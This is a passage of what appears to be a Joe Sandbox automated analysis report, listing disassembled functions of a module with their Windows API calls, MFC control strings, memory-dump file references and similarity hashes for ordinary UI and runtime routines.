GetDeviceCaps.GDI32(00000000,00000058), ref: 6CB2DBF0
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6CB2DBFC
ReleaseDC.USER32(00000000,00000000), ref: 6CB2DC08

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: MetricsSystem$CapsDevice$Release
String ID:
API String ID: 1151147025-0
Opcode ID: f4c880c6f5a55a8dc38aadc2eabdb99da7db213b2c869f36940fab8f136093ed
Instruction ID: d15e93a45c5d48a2f80a00ab071911de711ded0c63a03687b464bc4a93855b79
Opcode Fuzzy Hash: f4c880c6f5a55a8dc38aadc2eabdb99da7db213b2c869f36940fab8f136093ed
Instruction Fuzzy Hash: B0F0CFB1A42610ABEB146F71984DB5B7F74FB47B12F049516E6128B2C4DBB684818F90

Function 6CB4697F Relevance: 10.7, APIs: 7, Instructions: 214COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB46986
GetClientRect.USER32(?,?), ref: 6CB469B1
SetCapture.USER32(?), ref: 6CB469DB

Part of subcall function 6CB48A7B: IsRectEmpty.USER32(?), ref: 6CB48AA3
Part of subcall function 6CB48A7B: InvertRect.USER32(?,?), ref: 6CB48AB1
Part of subcall function 6CB48A7B: SetRectEmpty.USER32(?), ref: 6CB48AC3

SetCapture.USER32(?), ref: 6CB46A2D
PtInRect.USER32(?,?,?), ref: 6CB46B16
GetCapture.USER32 ref: 6CB46B3F
ReleaseCapture.USER32 ref: 6CB46B49

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$Capture$Empty$ClientH_prolog3_InvertRelease
String ID:
API String ID: 3834698328-0
Opcode ID: 5381ffc9c9e03f9956b9e4045b4e87faac75ae8ec724ca5a810d6bf49964a450
Instruction ID: bd01647bd82b869aeb8809880dda0bbc4e1c9b5fc43a778303897a4230d7d676
Opcode Fuzzy Hash: 5381ffc9c9e03f9956b9e4045b4e87faac75ae8ec724ca5a810d6bf49964a450
Instruction Fuzzy Hash: C881B931A052559BCF02DFA8C884AED7BB6FF08308F148469EC15EB765DB34E918DB51

Function 6CB4C4E4 Relevance: 10.7, APIs: 7, Instructions: 192windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB4C4EB
GetClientRect.USER32(00000000,00000000), ref: 6CB4C53D

Part of subcall function 6CB25025: __EH_prolog3.LIBCMT ref: 6CB2502C
Part of subcall function 6CB25025: GetDC.USER32(00000000), ref: 6CB25058

Part of subcall function 6CB262A8: SelectObject.GDI32(?,00000000), ref: 6CB262C8
Part of subcall function 6CB262A8: SelectObject.GDI32(?,00000000), ref: 6CB262DE

SendMessageW.USER32(00000000,00000030,?,00000000), ref: 6CB4C597
GetTextMetricsW.GDI32(?,?), ref: 6CB4C5A4
GetParent.USER32(00000000), ref: 6CB4C684
SendMessageW.USER32(00000000,00000030,?,00000000), ref: 6CB4C6AE
__EH_prolog3.LIBCMT ref: 6CB4C6D4

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3MessageObjectSelectSend$ClientH_prolog3_MetricsParentRectText
String ID:
API String ID: 3349635734-0
Opcode ID: 0119cae98e7e2d68707652433fa48a9ec7e76f22b1d731d29b7cb21a3c970451
Instruction ID: 71a44fa7961ba0bdc6fc8e3ed999f51df6d38ba7f2200c7e5f72f7670dc35ccd
Opcode Fuzzy Hash: 0119cae98e7e2d68707652433fa48a9ec7e76f22b1d731d29b7cb21a3c970451
Instruction Fuzzy Hash: CE61B072A005569FCF05DFA8C894BEEB7B5FF44304F148268E819AB694DB34ED09CB94

Function 6CBBC553 Relevance: 10.7, APIs: 7, Instructions: 174windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CBBC55D

Part of subcall function 6CBEA1DF: __EH_prolog3.LIBCMT ref: 6CBEA1E6

GetMenuItemCount.USER32(?), ref: 6CBBC5C1
GetMenuItemID.USER32(?,00000000), ref: 6CBBC5DB
GetMenuItemCount.USER32(?), ref: 6CBBC629
GetMenuItemID.USER32(00000000,00000000), ref: 6CBBC65B
SendMessageW.USER32(?,00000234,00000000,00000000), ref: 6CBBC6C0
GetMenuState.USER32(00000001,00000000,00000400), ref: 6CBBC723

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Menu$Item$Count$H_prolog3H_prolog3_MessageSendState
String ID:
API String ID: 999183886-0
Opcode ID: 723d9b37d18af0a857dc7f472bb8406af53e4a325ab5d7806b5b4e7e2099e1f3
Instruction ID: 34078a18125f2609d2a6f62a7ead6fd7d8abe07237b4bdc4281e90259df124c6
Opcode Fuzzy Hash: 723d9b37d18af0a857dc7f472bb8406af53e4a325ab5d7806b5b4e7e2099e1f3
Instruction Fuzzy Hash: 56616070A012A69BDF25DF25CC44BFDB6B4AF05718F1002A99829B6A90DF709A85CF45

Function 6CB4FCC5 Relevance: 10.7, APIs: 7, Instructions: 156COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 6CB4FCDB
_wcslen.LIBCMT ref: 6CB4FD01
_wcsstr.LIBVCRUNTIME ref: 6CB4FD31
_wcslen.LIBCMT ref: 6CB4FD41
_wcsstr.LIBVCRUNTIME ref: 6CB4FDA3
_wcsstr.LIBVCRUNTIME ref: 6CB4FE0A
_wcslen.LIBCMT ref: 6CB4FE20

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: _wcslen$_wcsstr
String ID:
API String ID: 559806763-0
Opcode ID: a3aaa6c4f0ce37bdbd5b0d66a7863b80a05dc5250d90acb4bb0e7761848616d0
Instruction ID: 2ae462c03be8864ce33fee9a5b49efe4ff31d69fa18fe8f0ad19f986f9b5a6d8
Opcode Fuzzy Hash: a3aaa6c4f0ce37bdbd5b0d66a7863b80a05dc5250d90acb4bb0e7761848616d0
Instruction Fuzzy Hash: 8651C472D0422AEFCB10CFA8C8809EEB7F9FF48354F15815AD814B7704EB30AA559B91

Function 6CC682D7 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,6CC68A4C,00000000,00000000,00000000,00000000,00000000,6CC582D9), ref: 6CC68319
__fassign.LIBCMT ref: 6CC68394
__fassign.LIBCMT ref: 6CC683AF
WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 6CC683D5
WriteFile.KERNEL32(?,00000000,00000000,6CC68A4C,00000000,?,?,?,?,?,?,?,?,?,6CC68A4C,00000000), ref: 6CC683F4
WriteFile.KERNEL32(?,00000000,00000001,6CC68A4C,00000000,?,?,?,?,?,?,?,?,?,6CC68A4C,00000000), ref: 6CC6842D

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: b184e20f4a249c326c86bbc9b6ae44a2bc695b00512e164b58dab6a85ffe7142
Instruction ID: ee9045c56e1828dfc66b4960859b013d36b13e8cfc93aca496888c36a4a24b9e
Opcode Fuzzy Hash: b184e20f4a249c326c86bbc9b6ae44a2bc695b00512e164b58dab6a85ffe7142
Instruction Fuzzy Hash: 11519171A012499FDF00CFA9C991EEEBBF8EF0A314F14411AE951E7A91E730A941CB61

Function 6CB42AAA Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 148COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6CB42AB1

Part of subcall function 6CB3A22E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 6CB3A243

Part of subcall function 6CB846CA: __EH_prolog3.LIBCMT ref: 6CB846D1

Part of subcall function 6CB8602D: __EH_prolog3.LIBCMT ref: 6CB86034

Strings

MFCMaskedEdit_Mask, xrefs: 6CB42B28
MFCMaskedEdit_InputTemplate, xrefs: 6CB42B60
MFCMaskedEdit_DefaultChar, xrefs: 6CB42B9C
MFCMaskedEdit_ValidChars, xrefs: 6CB42C1C
MFCMaskedEdit_SelectByGroup, xrefs: 6CB42AED

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3$ByteCharH_prolog3_catchMultiWide
String ID: MFCMaskedEdit_DefaultChar$MFCMaskedEdit_InputTemplate$MFCMaskedEdit_Mask$MFCMaskedEdit_SelectByGroup$MFCMaskedEdit_ValidChars
API String ID: 207285973-975932772
Opcode ID: 665f1cf926443d77b6985b99b3a5b93a3b648c3c927d7ad98e308f49ebcc0a5e
Instruction ID: b15864e1c43a21dde2458ed517697dc9a36424909ffd5ab4b92ff6cfda96881d
Opcode Fuzzy Hash: 665f1cf926443d77b6985b99b3a5b93a3b648c3c927d7ad98e308f49ebcc0a5e
Instruction Fuzzy Hash: AE515C7090518AABDF05DFA4C8A4EFEB778AF14308F104469E412B7B90EF359A09DF21

Function 6CB448E3 Relevance: 10.6, APIs: 7, Instructions: 147windowCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 6CB44938
SendMessageW.USER32(?,0000120C,00000000,00000002), ref: 6CB44964
_wcslen.LIBCMT ref: 6CB44971
SendMessageW.USER32(?,0000120C,00000001,00000002), ref: 6CB44998
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 6CB449BD
GetCapture.USER32 ref: 6CB44A4F
ReleaseCapture.USER32 ref: 6CB44A59

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: CaptureMessageSend_wcslen$RedrawReleaseWindow
String ID:
API String ID: 1886290311-0
Opcode ID: 5cae922f55e2fb9d068e6afbaca26de222e3e452991cf93bf3a937ebce34ca04
Instruction ID: 90a9d1d434b80e4c6816cded87276cbbda9458668032d43e78a61430402d8629
Opcode Fuzzy Hash: 5cae922f55e2fb9d068e6afbaca26de222e3e452991cf93bf3a937ebce34ca04
Instruction Fuzzy Hash: B441F1317042109FDF059F28D884BAE7BB6FF88354F144169EC19AB794DB30AC21DB99

Function 6CB4CFDA Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 143COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6CB4D024

Strings

MFCVSListbox_NewButton, xrefs: 6CB4D089
MFCVSListbox_UpButton, xrefs: 6CB4D0EA
MFCVSListbox_BrowseButton, xrefs: 6CB4D060
MFCVSListbox_DownButton, xrefs: 6CB4D11A
MFCVSListbox_RemoveButton, xrefs: 6CB4D0BA

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: H_prolog3
String ID: MFCVSListbox_BrowseButton$MFCVSListbox_DownButton$MFCVSListbox_NewButton$MFCVSListbox_RemoveButton$MFCVSListbox_UpButton
API String ID: 431132790-4178308353
Opcode ID: 1a34ae1364c9b7a9ce61c0e87f94ca628e80eccb49593f0257e60d188a6ed2d4
Instruction ID: 9b80d5174afb7c4e24b3bf56d0862436a7476afefb869a400c964e9530b3931b
Opcode Fuzzy Hash: 1a34ae1364c9b7a9ce61c0e87f94ca628e80eccb49593f0257e60d188a6ed2d4
Instruction Fuzzy Hash: A1418370D051599ADF11DEB4D890AFE76BDEF4422CF208225D820E3B94DB749A099A61

Function 6CB573E2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 137windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB573E9

Part of subcall function 6CB2512A: __EH_prolog3.LIBCMT ref: 6CB25131
Part of subcall function 6CB2512A: GetWindowDC.USER32(00000000,00000004,6CB50443,00000000), ref: 6CB2515D

CreateCompatibleDC.GDI32(00000000), ref: 6CB57420
CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6CB5749F
CreateCompatibleBitmap.GDI32(?,6CC86178,?), ref: 6CB574B6

Part of subcall function 6CB26249: SelectObject.GDI32(0000005C,?), ref: 6CB26252

FillRect.USER32(?,00000000,-00000098), ref: 6CB574FE

Strings

(, xrefs: 6CB57464

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Create$Compatible$BitmapFillH_prolog3H_prolog3_ObjectRectSectionSelectWindow
String ID: (
API String ID: 2680359821-3887548279
Opcode ID: d8579ea96d2a577b918f6628216ff5c0adbf1925c0a6b23ff63bd0eeb07be8dc
Instruction ID: 16f758dc7d44646b8d78ee9fe9d2314e5995bd83f183194858fe79ef0855c249
Opcode Fuzzy Hash: d8579ea96d2a577b918f6628216ff5c0adbf1925c0a6b23ff63bd0eeb07be8dc
Instruction Fuzzy Hash: 8B5129B1D10288ABDF14CFE5D884AEEFBB8FF05308F50812EE416AB654DB749919CB10

Function 6CB53830 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 129COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6CB53837

Part of subcall function 6CB4FC03: __EH_prolog3.LIBCMT ref: 6CB4FC0A
Part of subcall function 6CB4FC03: LoadCursorW.USER32(00000000,00007F00), ref: 6CB4FC2F
Part of subcall function 6CB4FC03: GetClassInfoW.USER32(?,?,?), ref: 6CB4FC70

CopyRect.USER32(?,?), ref: 6CB538EC

Part of subcall function 6CB25BCB: ClientToScreen.USER32(?,?), ref: 6CB25BDA
Part of subcall function 6CB25BCB: ClientToScreen.USER32(?,?), ref: 6CB25BE7

IsRectEmpty.USER32(?), ref: 6CB53904
IsRectEmpty.USER32(?), ref: 6CB5391F
IsRectEmpty.USER32(?), ref: 6CB53937

Strings

Afx:ControlBar, xrefs: 6CB53876

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Rect$Empty$ClientScreen$ClassCopyCursorH_prolog3H_prolog3_InfoLoad
String ID: Afx:ControlBar
API String ID: 2202805320-4244778371
Opcode ID: e3c1f7620e43393d50ffa460d624f887cf181f99d088cdf4cf6ba8f493fdaf85
Instruction ID: ef08ac3a2c223574f9af8eaab0fb08281d8101efd538f854fac9e89ba1aa7647
Opcode Fuzzy Hash: e3c1f7620e43393d50ffa460d624f887cf181f99d088cdf4cf6ba8f493fdaf85
Instruction Fuzzy Hash: 22414AB1E00659ABCF02CFA4C8849DEBBBABF49304F444119E805B7750DB75AE19CFA0

Function 6CB2B17F Relevance: 10.6, APIs: 7, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 6CB2B1AC
PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000000), ref: 6CB2B1D0
UpdateWindow.USER32(?), ref: 6CB2B1EA
SendMessageW.USER32(?,00000121,00000000,?), ref: 6CB2B20D
SendMessageW.USER32(?,0000036A,00000000,00000000), ref: 6CB2B224
UpdateWindow.USER32(?), ref: 6CB2B275
PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 6CB2B2BD

Part of subcall function 6CB2D632: GetWindowLongW.USER32(?,000000F0), ref: 6CB2D63F

Memory Dump Source

Source File: 00000013.00000002.4038819004.000000006CAF1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000013.00000002.4038753093.000000006CAF0000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039191393.000000006CC83000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039324858.000000006CD52000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039360070.000000006CD54000.00000008.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD57000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039414452.000000006CD59000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039487764.000000006CD60000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039547732.000000006CD73000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000013.00000002.4039590943.000000006CD90000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_6caf0000_uc_ctrl.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 4845bbe4b471124025a57534a1fd4b9c1f35e898c5bd633e81d99ee2c3f70c0a
Instruction ID: f41dfcd3c7e0bc32948627202172dfe2d916ddc05801abce24717e977edc3a86
Opcode Fuzzy Hash: 4845bbe4b471124025a57534a1fd4b9c1f35e898c5bd633e81d99ee2c3f70c0a
Instruction Fuzzy Hash: 1641D330B45385BBEB018FA5C944BADBFB4FF05758F144128E90AA79D0CB78E944CB81

Function 6CB4B41E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 125COMMON

Download Yara Rule

APIs

SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,?), ref: 6CB4B45B

Part of subcall function 6CB1FBA5: __CxxThrowException@8.LIBVCRUNTIME ref: 6CB1FBB9

SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000208), ref: 6CB4B4C1
__EH_prolog3.LIBCMT ref: 6CB4B500

Part of subcall function 6CB3A22E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000), ref: 6CB3A243

Part of subcall function 6CB846CA: __EH_prolog3.LIBCMT ref: 6CB846D1

Part of subcall function 6CB1A044: __EH_prolog3.LIBCMT ref: 6CB1A0F2

